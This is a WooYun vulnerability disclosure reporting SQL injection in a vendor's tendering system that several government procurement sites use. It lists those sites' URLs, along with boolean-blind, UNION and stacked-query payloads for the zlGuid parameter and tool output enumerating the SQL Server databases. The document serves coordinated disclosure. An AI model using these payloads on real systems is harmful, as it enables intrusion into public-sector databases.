当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104465

漏洞标题:某政府在用系统存在一处SQL注入

相关厂商:杭州腾升网络科技有限公司

漏洞作者: 路人甲

提交时间:2015-03-30 14:23

修复时间:2015-07-02 14:48

公开时间:2015-07-02 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向第三方安全合作伙伴开放
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

某政府在用系统存在一处SQL注入

详细说明:

杭州腾升网络科技有限公司
案例
http://www.gtggjy.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB
http://www.qfztb.gov.cn/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB
http://www.zjhnztb.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB
http://www.jszbw.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB
http://www.smztb.com.cn/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB
http://122.226.154.126/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB

漏洞证明:

参数zlGuid存在注入
漏洞文件:/ZlFileCTRL.do
测试:http://www.jszbw.com/TSPB/cms/zlfile/ZlFileCTRL.do?action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB

Place: GET
Parameter: zlGuid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB' AND 3230=3
230 AND 'vguk'='vguk
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: action=download&zlGuid=-3594' UNION ALL SELECT NULL,NULL,NULL,CHAR(
58) CHAR(100) CHAR(109) CHAR(101) CHAR(58) CHAR(66) CHAR(110) CHAR(118) CHAR(118
) CHAR(77) CHAR(101) CHAR(69) CHAR(100) CHAR(104) CHAR(86) CHAR(58) CHAR(116) CH
AR(102) CHAR(116) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: action=download&zlGuid=F733FAD00EA6FE07348C883F442F3DAB'; WAITFOR D
ELAY '0:0:5'--
---
[19:45:22] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000
[19:45:22] [INFO] fetching database names
[19:45:26] [INFO] the SQL query used returns 8 entries
[19:45:30] [INFO] retrieved: "jsggzy"
[19:45:31] [INFO] retrieved: "JsZjPb"
[19:45:33] [INFO] retrieved: "master"
[19:45:33] [INFO] retrieved: "model"
[19:45:35] [INFO] retrieved: "msdb"
[19:45:35] [INFO] retrieved: "Northwind"
[19:45:37] [INFO] retrieved: "pubs"
[19:45:38] [INFO] retrieved: "tempdb"
available databases [8]:
[*] jsggzy
[*] JsZjPb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb

修复方案:

RT

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-03 14:46

厂商回复:

最新状态:

暂无


漏洞评价:

评论